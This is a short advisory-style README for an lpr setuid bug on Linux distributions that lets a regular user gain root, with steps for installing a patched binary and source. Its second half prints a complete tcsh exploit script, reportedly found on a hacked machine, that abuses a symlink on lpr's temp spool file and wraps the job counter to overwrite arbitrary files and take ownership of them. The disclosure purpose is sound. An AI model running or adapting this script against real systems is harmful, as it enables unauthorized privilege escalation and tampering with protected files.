41 lines
1.2 KiB
ObjectPascal
41 lines
1.2 KiB
ObjectPascal
ALL current versions of lpr on all distributions have a bug
|
|
that can give a regular user root access very easily.
|
|
|
|
The file "lpr" in this fix directory has this bug fixed, and
|
|
should be copied to /usr/bin/lpr (owned by root, group lp, mode 6755)
|
|
|
|
The file "lpr.c" is the patched source file, that should be copied
|
|
to /usr/src/usr.sbin/lpd-5.12/lpr/lpr.c.
|
|
|
|
The following is a script demonstrating the hole that was found on a
|
|
hacked machine.
|
|
--------------------------------------------------------------------
|
|
#!/bin/tcsh -f
|
|
#
|
|
# Usage: lcp from-file to-file
|
|
#
|
|
|
|
if ($#argv != 2) then
|
|
echo Usage: lcp from-file to-file
|
|
exit 1
|
|
endif
|
|
|
|
# This link stuff allows us to overwrite unreadable files,
|
|
# should we want to.
|
|
echo x > /tmp/.tmp.$$
|
|
lpr -q -s /tmp/.tmp.$$
|
|
rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
|
|
ln -s $2 /tmp/.tmp.$$ # to where we really want
|
|
|
|
@ s = 0
|
|
while ( $s != 999) # loop 999 times
|
|
lpr /nofile >&/dev/null # spin the job number till it wraps!
|
|
@ s++
|
|
if ( $s % 10 == 0 ) echo -n .
|
|
end
|
|
lpr $1 # write source file over old data file
|
|
# user becomes owner
|
|
rm -f /tmp/.tmp.$$
|
|
exit 0
|
|
|